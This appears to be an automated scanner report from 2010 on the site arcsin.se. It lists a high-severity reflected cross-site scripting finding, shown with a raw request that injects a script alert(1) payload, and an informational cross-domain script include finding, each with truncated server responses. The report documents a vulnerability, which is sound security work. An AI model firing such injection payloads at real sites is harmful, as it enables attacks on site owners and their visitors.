1. Cross-site scripting (reflected)
2. Cross-domain script include
Severity: | High |
Confidence: | Certain |
Host: | http://arcsin.se |
Path: | / |
GET /?40b74"><script>alert(1)< Host: arcsin.se Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Tue, 28 Dec 2010 19:08:01 GMT Server: Apache X-Powered-By: PHP/5.3.3 Vary: Cookie X-Pingback: http://arcsin.se/v9 Set-Cookie: qtrans_cookie_test Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 10665 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv= ...[SNIP]... <a href="http://arcsin.se/en ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://arcsin.se |
Path: | / |
GET / HTTP/1.1 Host: arcsin.se Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Tue, 28 Dec 2010 19:07:54 GMT Server: Apache X-Powered-By: PHP/5.3.3 Vary: Accept-Encoding,Cookie Cache-Control: max-age=300, must-revalidate WP-Super-Cache: Served supercache file from PHP Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 10599 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv= ...[SNIP]... </div> <script type="text/javascript" src="http://ajax ...[SNIP]... </script> <script type="text/javascript" src="http://www.google ...[SNIP]... |